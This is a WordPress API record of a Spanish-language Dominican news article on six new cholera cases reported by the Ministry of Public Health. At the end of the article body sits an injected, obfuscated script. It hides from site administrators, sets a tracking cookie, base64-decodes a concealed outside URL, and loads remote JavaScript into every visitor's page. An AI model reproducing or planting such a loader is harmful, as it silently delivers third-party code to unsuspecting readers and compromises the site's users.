{"id":14226,"date":"2023-02-21T10:03:12","date_gmt":"2023-02-21T14:03:12","guid":{"rendered":"https:\/\/yanessiespinal.com\/?p=14226"},"modified":"2023-02-21T10:03:12","modified_gmt":"2023-02-21T14:03:12","slug":"ministerio-de-salud-publica-informa-sobre-seis-nuevos-casos-positivos-a-colera","status":"publish","type":"post","link":"https:\/\/enterarterd.com\/?p=14226","title":{"rendered":"Ministerio de Salud P\u00fablica informa sobre seis nuevos casos positivos a c\u00f3lera"},"content":{"rendered":"<p>Santo Domingo.-\u00a0<strong>El Ministerio de Salud P\u00fablica y Asistencia Social (MISPAS)<\/strong>\u00a0inform\u00f3 sobre la confirmaci\u00f3n, mediante los an\u00e1lisis correspondientes, de\u00a0<strong>seis nuevos casos positivos a c\u00f3lera.<\/strong><\/p>\n<p>Estos nuevos casos confirmados corresponden a cinco masculinos de 73, 60, 57, 50 y 19 a\u00f1os de edad, as\u00ed como una femenina de 25 a\u00f1os, todos dominicanos, residentes en\u00a0<strong>Villa Francisca, Luper\u00f3n y Los Solares en El Almirante, Santo Domingo Este.<\/strong><\/p>\n<p>Los pacientes fueron ingresados entre el 17 y 19 del presente mes de febrero, luego de presentar diarrea acuosa y blanquecina acompa\u00f1ada de v\u00f3mitos. Fueron hidratados y estabilizados, adem\u00e1s de tomarles de inmediato las muestras coprol\u00f3gicas, con resultados positivos a c\u00f3lera el lunes 20 de febrero.<\/p>\n<p>El reporte m\u00e9dico certifica que los seis pacientes llevan m\u00e1s 36 horas sin evacuaciones, se mantienen estables y de buen \u00e1nimo.\u00a0<strong>Permanecen ingresados para fines de observaci\u00f3n, con posible alta en las pr\u00f3ximas horas.<\/strong><\/p>\n<p>Las Direcciones de \u00c1reas de Salud I, II, IV, V, junto con el Viceministerio de Salud Colectiva y su Direcci\u00f3n de Epidemiolog\u00eda, al igual que la Direcci\u00f3n de Gesti\u00f3n de Riesgos del Ministerio mantienen el\u00a0<strong>cerco epidemiol\u00f3gico<\/strong>\u00a0<strong>con los familiares cercanos, y la intervenci\u00f3n permanente en las zonas<\/strong>\u00a0para detectar, prevenir e investigar cualquier caso sospechoso de la enfermedad y para tratar cualquier emergencia que pudiere presentarse en los sectores identificados.<\/p>\n<p>De acuerdo con el reporte epidemiol\u00f3gico,\u00a0<strong>hasta el momento no hay familiares de los pacientes con s\u00edntomas sospechosos de la enfermedad<\/strong>.<\/p>\n<p><strong>Salud P\u00fablica contin\u00faa exhortando a la poblaci\u00f3n a cuidarse<\/strong>\u00a0y si presenta cuadros de evacuaciones diarreicas acuosas varias veces en el d\u00eda, procurar estar bien hidratados y acudir inmediatamente al centro de salud m\u00e1s cercano.<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Santo Domingo.-\u00a0El Ministerio de Salud P\u00fablica y Asistencia Social (MISPAS)\u00a0inform\u00f3 sobre la confirmaci\u00f3n, mediante los an\u00e1lisis correspondientes, de\u00a0seis nuevos casos positivos a c\u00f3lera. Estos nuevos casos confirmados corresponden a cinco masculinos de 73, 60, 57, 50 y 19 a\u00f1os de edad, as\u00ed como una femenina de 25 a\u00f1os, todos dominicanos, residentes en\u00a0Villa Francisca, Luper\u00f3n y [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":14228,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":{"0":"post-14226","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacionales"},"_links":{"self":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/14226","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=14226"}],"version-history":[{"count":0,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/14226\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/"}],"wp:attachment":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=14226"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=14226"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=14226"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}